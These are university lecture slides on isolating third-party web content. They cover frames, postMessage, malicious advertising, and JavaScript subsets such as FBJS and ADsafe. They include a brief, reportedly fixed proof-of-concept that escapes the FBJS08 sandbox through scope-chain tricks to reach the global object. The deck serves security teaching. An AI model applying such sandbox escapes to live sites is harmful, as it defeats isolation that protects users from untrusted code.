Mashups and Language-Based Isolation
John Mitchell
CS 142 Winter 2009
Mashups
Advertisements
Social Networking Sites
Third-party content: Ads
Customer accounts
Advertising network
Third-party content: Apps
User data
User-supplied application
Why Use Frames
Isolation
  Different frames can represent different principals
  Same-origin policy: a frame can only read or modify frames from the same scheme/host/port
Delegation
  Frame can draw only on its own rectangle
Modularity
  Reuse the same content in multiple places
Failure containment
  Parent may work even if frame is slow to load or broken
src = 7.gmodules.com/..., name = remote_iframe_7
src = google.com/…, name = awglogin
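The same-origin rule above compares three components of a URL. As a rough sketch, assuming a hypothetical helper named sameOrigin (not a browser API) and the standard URL class, the comparison could look like this:

```javascript
// Hypothetical helper (not a browser API): two URLs share an origin
// when scheme, host, and port all match.
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA);
  const b = new URL(urlB);
  // URL normalizes default ports (80 for http, 443 for https) to "".
  return a.protocol === b.protocol &&
         a.hostname === b.hostname &&
         a.port === b.port;
}

console.log(sameOrigin("http://example.com/a", "http://example.com:80/b")); // true
console.log(sameOrigin("http://example.com/", "https://example.com/"));     // false: scheme differs
console.log(sameOrigin("http://example.com/", "http://example.com:8080/")); // false: port differs
console.log(sameOrigin("http://example.com/", "http://www.example.com/"));  // false: host differs
```

The example.com URLs are placeholders. Browsers enforce this check internally; the sketch only illustrates which parts of the URL matter.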
Why Not To Use Frames
Inconvenient
  Container does not fit content
  Quirky browser behavior (history, sound)
  Performance impact
Security Concerns
  Frame hijacking
  Browser exploits
Inability to Communicate
Cannot send messages to cross-domain frames
Alternatives
  Flash
  Rewriting: FBJS, ADsafe, Caja
postMessage
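// Sender: name the origin allowed to receive the message (https scheme assumed for illustration)
frames[0].postMessage("Hello world.", "https://example.com");
// Receiver: listen on window and check the sender's origin before replying
window.addEventListener("message", receiver);
function receiver(e) {
  if (e.origin == "https://example.com") {
    if (e.data == "Hello world.")
      e.source.postMessage("Hello", e.origin);
  }
}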
Referer Suppression Experiment
Measure how often Referer is suppressed
Placed a JavaScript advertisement for $200
283,945 impressions
Remember this from Lecture 12 by Collin?
How does this work?
[Figure: ad delivery chain with labels Advertiser, Ad Network, Publisher, Browser, and Ad Server; the page in the browser holds Content and an Ad]
Can retrieve “image” that is part of ad
“Zero-click attacks”
Clients vulnerable
  Malware can attack browser implementation errors
  Browser-resident malware can use intended functionality to carry out malicious attacks
Easy to place
  $30 in advertisements reaches 50,000 browsers
Brian Krebs on Computer Security
Hackers Exploit Adobe Reader Flaw
Security Fix has learned that … security hole in … Adobe Reader … is actively being exploited to break into Microsoft Windows computers. According to information released Friday by iDefense, … Web site administrators … spotted hackers taking advantage of the flaw on Jan. 20, 2008, when tainted banner ads were identified that served specially crafted Acrobat PDF files designed to exploit the hole and install malicious software.
Ad serves PDF file that installs Zonebac, modifies search engine results
Problems with advertisements
Ad network, publisher have incentives to show ads
  Could place ads in iframe
  Rules out more profitable floating ads, etc.
Ad network and publisher can try to screen ads
  Yahoo! ADsafe
  Google Caja
Some limitations in current web
  Ads may contain links to “images” that are part of ad
Important to remember
  This is a very effective way to reach victims: $30-50 per 1000
  User does not have to click on anything to run malicious code
Sandbox
A safe place for kids to play without hurting each other or anyone else
Possible approach
Goal
  Write a static analyzer to check untrusted JavaScript and determine if it is malicious
Solvable?
  Very difficult because of functions that can convert strings to code and vice versa, e.g., eval
More likely to have a solution
  Find a well-defined and meaningful subset of JavaScript for which this is solvable
  Prohibit problematic functions like eval
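To see why eval gets in the way of static checking, consider a deliberately naive checker. The sketch below is an assumption for illustration only: looksSafe and looksSafeNoEval are hypothetical names, and a regular expression stands in for a real analyzer. The untrusted string is only inspected, never executed.

```javascript
// Hypothetical naive checker: reject source text that mentions "alert".
function looksSafe(source) {
  return !/\balert\b/.test(source);
}

// The forbidden name never appears textually; it is assembled at run time.
const untrusted = 'var name = "al" + "ert"; eval(name + "(\'hi\')");';
console.log(looksSafe(untrusted)); // true: the checker is fooled

// Prohibiting eval itself is a purely textual check that closes this hole.
function looksSafeNoEval(source) {
  return looksSafe(source) && !/\beval\b/.test(source);
}
console.log(looksSafeNoEval(untrusted)); // false
```

Forbidding eval alone is not sufficient in general, since other constructs can also turn strings into code or property names. Choosing a restricted subset makes a textual check like this meaningful.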
Some JavaScript examples
Use of this inside functions
var b = 10;
var f = function() {
  var b = 5;
  function g() { var b = 8; return this.b; }
  return g();   // in non-strict code, this inside g is the global object
};
var result = f();   // has as value 10 when run as a top-level script
Implicit conversions
var y = "a";
var x = { toString: function() { return y; } };
x = x + 10;   // implicit call to toString; x is now "a10"
Sometimes tricky
Which declaration of g is used?
var f = function() {
  var a = g();   // both function declarations are hoisted and the later one wins
  function g() { return 1; }
  function g() { return 2; }
  var g = function() { return 3; };   // this assignment runs only after g() was called
  return a;
};
var result = f();   // has as value 2
String computation of property names
for (p in o){....}, eval(...), o[s] allow strings to be used as code and vice versa
var m = "toS"; var n = "tring";
Object.prototype[m + n] = function() { return undefined; };
Facebook FBJS
Subset of JavaScript for Facebook applications
Application code is fetched from the publisher's (untrusted) server and embedded as a subtree of the page
Not placed in an iframe
Application code is statically checked to see if it is valid FBJS
FBJS code is rewritten and certain run-time checks are added
FBJS restrictions
Security Goal
  Restrict access: Document Object Model (DOM), global object
  Prevent clashes with other applications
Method 1: Filtering
  Forbid eval, with
  Disallow explicit access (via the dot notation o.p) to properties valueOf, __parent__, constructor
Method 2: Rewriting
  Add application-specific prefix to all top-level identifiers
  Example: o.p is renamed to a1234_o.p
  Separate effective namespace of an application from others
More about FBJS08
Some details of rewriting:
this is rewritten to ref(this)
  ref is a function defined by the host (Facebook) in the global object
  ref(x) = x if x ≠ window, else ref(x) = null
  Prevents application code from accessing the global object
o[p] gets rewritten to o[idx(p)]
  Returns error if p is a blacklisted property, such as "__x__"
Facebook also provides libraries, accessible within the application namespace, that allow applications to safely access certain parts of the global object
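The two run-time checks described above can be sketched as follows. This is not Facebook's code: fakeWindow stands in for the browser's window so the sketch runs outside a browser, the blacklist contents are an assumption, and throwing an exception is one possible reading of "returns error".

```javascript
// Stand-in for the browser's window object so the sketch runs anywhere.
const fakeWindow = { secret: "global data" };

// ref as described on the slide: hide the global object, pass everything else through.
function ref(x) {
  return x === fakeWindow ? null : x;
}

// Hypothetical blacklist; the real FBJS list is not given in the slides.
const BLACKLIST = new Set(["__parent__", "constructor", "valueOf"]);

// idx: reject blacklisted property names, otherwise return the name unchanged.
function idx(p) {
  const name = String(p);
  if (BLACKLIST.has(name)) {
    throw new Error("forbidden property: " + name);
  }
  return name;
}

const o = { color: "red" };
console.log(ref(o) === o);     // true
console.log(ref(fakeWindow));  // null
console.log(o[idx("color")]);  // "red"
```

Under this reading, rewritten application code such as o[idx(p)] fails at run time when p names a blacklisted property, and ref(this) yields null whenever this is the global object.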
Problem with FBJS08
Attack: Get a handle to the global object in the application code
Almost works:
var getthis = function() { return this; };
Except that this gets rewritten to ref(this) and the code returns null
But we can redefine ref itself
  ref is defined in the global object and application code is disallowed from having a handle to the global object
  But can define a local ref in a local scope and defeat FBJS08
try { throw (function() { return this; }); } catch (f) { curr_scp = f(); }
Exploit code (now fixed!)
<a href="#" onclick="a()">Test A (Firefox and Safari)</a>
<script>
var get_win = function get_scope(x) {
  if (x==0) { return this }
  else { get_scope(0).ref = function(x) { return x }; return get_win(0) }
};
function a() { get_win(1).alert("Hacked!") }
</script>
<a href="#" onclick="b()">Test B (Safari, Opera and Chrome)</a>
<script>
function b() {
  try { throw (function() { return this }); }
  catch (get_scope) { get_scope().ref = function(x) { return x }; this.alert("Hacked!") }
}
</script>
Attack 1
ECMA-262 semantics for try{...} catch(f){...} says that whenever an exception is thrown:
  A new object o is created with property f pointing to the exception object
  o is placed on top of the scope chain (o does not have activation object status)
The "this" of a function not defined in an activation object is the object containing it
In the code above, this for get_scope resolves to o
Shadow the original ref by redefining it in o
try { throw (function() { return this }); } catch (get_scope) { get_scope().ref = function(x) { return x }; }
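The shadowing step can be simulated without relying on engine-specific catch behavior. The sketch below is an assumption-laden model, not the exploit: globalObj and scopeObj are hypothetical stand-ins for the global object and the scope object o, and nested with statements imitate a scope chain in which o sits above the global object. Current engines follow later editions of ECMAScript, so the original attack is not expected to reproduce as written.

```javascript
// Stand-in global object holding the host's ref (hypothetical names throughout).
const globalObj = {};
globalObj.ref = function (x) { return x === globalObj ? null : x; };

// Stand-in for the extra object o that catch places on the scope chain.
const scopeObj = {};

// Built with the Function constructor so `with` is allowed even if the
// surrounding code is strict. Lookup of `ref` tries o first, then g.
const resolveRef = new Function("g", "o", "value",
  "with (g) { with (o) { return ref(value); } }");

console.log(resolveRef(globalObj, scopeObj, globalObj)); // null: the host's ref is used

// The attack's key step: define ref on the scope object.
scopeObj.ref = function (x) { return x; };
console.log(resolveRef(globalObj, scopeObj, globalObj) === globalObj); // true: the host's ref is shadowed
```

Once a ref property exists on an object higher in the scope chain, every rewritten ref(this) resolves to the attacker's identity function instead of the host's check.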
Attack 2
ECMA-262 says that whenever a named recursive function f is created, the internal scope chain (f_scp) of the function (the environment pointer of the closure) is set to the current lexical scope with a dummy object (o_f) placed on top.
var get_window = function f(x) { if (x===0) { return this } else { return f(x-1) } };
Attack 2
When the function f is called, the current scope chain is replaced with f_scp and an activation object for f is placed on top of it
Every recursive call to f will resolve to property f of the dummy object o_f (which is not an activation object)
Accessing this inside f will resolve to o_f
Shadow the original ref by redefining it in o_f
var get_window = function f(x) { if (x===0) { return this } else { return f(x-1) } };
What is possible?
Filtering principle
  Subset of JavaScript: if program accesses property p, either p appears textually in program, or is from list of “implicit” properties
Isolation principle 1
  Subset of JavaScript: semantics-preserving capture-avoiding renaming of identifiers (except names of predefined properties)
Isolation principle 2
  Subset of JavaScript: no program can access any scope object
Isolation principle 3
  Given lists of forbidden properties PnoW and PnoRW, cannot write properties in PnoW and cannot read or write properties in PnoRW
Rewriting principles
  Achieve some forms of isolation by restricting semantics
Isolation of property names (Jt)
Goal
  All property names that get accessed must appear textually in the code
If the program does not contain eval, Function, o[..] etc., which convert strings to code
Then any property accessed is either in the code or an implicit property access: toString, toNumber, valueOf, length, prototype, constructor, message, arguments, Object, Array
Application
  If we want to prevent access to certain properties, restrict to this sublanguage Jt and inspect code
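The "restrict and inspect" idea can be sketched as a two-step check. Everything here is a simplification made for illustration: accessedNames and allowed are hypothetical names, the regular expressions stand in for a real parser, and the bracket test is deliberately conservative (it also rejects array literals).

```javascript
// Hypothetical checker for the idea behind Jt; a real one would work on a
// parse tree, not on regular expressions.
const FORBIDDEN_CONSTRUCTS = [/\beval\b/, /\bFunction\b/, /\[/];

function accessedNames(source) {
  // Reject constructs that can turn strings into code or property names.
  for (const pattern of FORBIDDEN_CONSTRUCTS) {
    if (pattern.test(source)) return null;
  }
  // Otherwise every explicit property access appears as ".name" in the text.
  const names = new Set();
  for (const match of source.matchAll(/\.\s*([A-Za-z_$][\w$]*)/g)) {
    names.add(match[1]);
  }
  return names;
}

function allowed(source, blacklist) {
  const names = accessedNames(source);
  if (names === null) return false; // program is outside the subset
  return blacklist.every((p) => !names.has(p));
}

console.log(allowed("var t = o.title;", ["cookie"]));                  // true
console.log(allowed("var c = document.cookie;", ["cookie"]));          // false
console.log(allowed('var c = document["coo" + "kie"];', ["cookie"]));  // false: o[...] is outside the subset
```

The point of the subset is that the second step becomes sound: once string-to-property conversions are excluded, inspecting the program text is enough to bound which explicit property names it can touch. Implicit accesses such as toString still need separate treatment.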
Isolating scope objects (Js)
How can code in subset Jt access scope objects?
  Identifier this
  Object.prototype.valueOf, Array.prototype.sort/concat/reverse can implicitly access this
Define subset Js of Jt
  Prohibit this, valueOf, sort, concat and reverse
Properties of Js
  Programs cannot access scope object
  Can rename variables; variable names can never be accessed (explicitly) as properties
  But not variables with the same name as native properties
Example: ADsafe
Security Goal
  Restrict access: Document Object Model (DOM), global object
Method 1: Filtering
  Forbid eval, with, ...
Method 2: Require special program idioms
  Access property p of object o by calling ADSAFE.get(o, p)
Subtlety:
ADsafe restriction: "All interaction with the trusted code must happen only using the methods in the ADSafe object."
This may not be possible!
// Somewhere in trusted code
Object.prototype.toString = function() { ... };
...
// Untrusted code
var o = {};
o = o + " ";   // converts o to String
Bottom line: need to restrict definitions that occur in trusted code
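The implicit call can be observed directly. In this sketch the replacement toString and the counter are hypothetical stand-ins for whatever the trusted page defines; the built-in method is restored afterwards so the rest of the program is unaffected.

```javascript
const original = Object.prototype.toString;
let trustedCalls = 0;
let converted;
try {
  // Trusted code (hypothetical): replaces the default conversion method.
  Object.prototype.toString = function () {
    trustedCalls += 1;
    return "[trusted]";
  };

  // Untrusted code: no explicit method call, yet the + operator invokes toString.
  const o = {};
  converted = o + " ";
} finally {
  Object.prototype.toString = original; // restore the built-in
}
console.log(converted);    // "[trusted] "
console.log(trustedCalls); // 1
```

The untrusted code never names toString, so a filter on explicit property names or a required access idiom would not catch this interaction with trusted code.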
Possible approach
Analyze the library of the host page
Compute a blacklist PnoRW of security-critical properties that could lead to security breach (How?)
Use subset Js + Filter for PnoRW
Conclusion
Modern sites incorporate third-party content
  Advertisements
  Applications
Third-party content must be isolated
  Or expose everyone to easy malicious attacks
Two basic approaches
  Use browser mechanism, such as iframes
  Filter, rewrite, and restrict execution of untrusted content
Language-based sandboxing is tricky
  Subtle problems with recent methods
  Progress on reliable foundations is possible
Web Advertising
Deliver advertisements to viewers via Web
More effective and more profitable if user profile is known
Source: U Texas iSchool student study, www.ischool.utexas.edu/~i385e/studentsPPT/fogle_IA&WebAdv.ppt
Web ad placement and type
Ad positions
  Dark orange (strong), light yellow (weak)
  Ads near rich content and navigation, and at the top-left do better
Ad types
  Banner
  Sidebar
  Pop-ups, pop-unders
  Floating
  Unicast
Banner
HTML code loads a specific website
Varies in content and shape
Horizontal
50 cents/ 1000
Sidebar
Skyscraper
Vertical
2-3 times larger than banner
Harder to scroll it off page
$1.00 - $1.50/ 1000
Pop-ups
Opens in its own window
Obscures the page you're viewing
Forced to close or move it
Pop-unders
Opens under the content you're viewing
Less intrusive than pop-up
Both are more effective than banner
Banners: 2-5 clicks/ 1000
Pop-ups: 30 clicks/ 1000
Can cost 4-10 times more than banner
Floating
Float or fly over page 5-30s
Obscure view; block mouse input
Gets attention: animation & sound
Powerful branding tool - hard to ignore
30 clicks/1000
$3 - $30/ 1000
Unicast
TV commercials that run in pop-up
10-30s
Same branding power as TV commercial + being able to go to website
50 clicks/1000
$30/1000
From AOL.com
Web Publishing and Advertising
[Figure: ad delivery chain Advertiser, Ad Network, Publisher, Browser, relabeled as Attacker, Intermediary, Intermediary, Victim; the page holds Content and an Ad]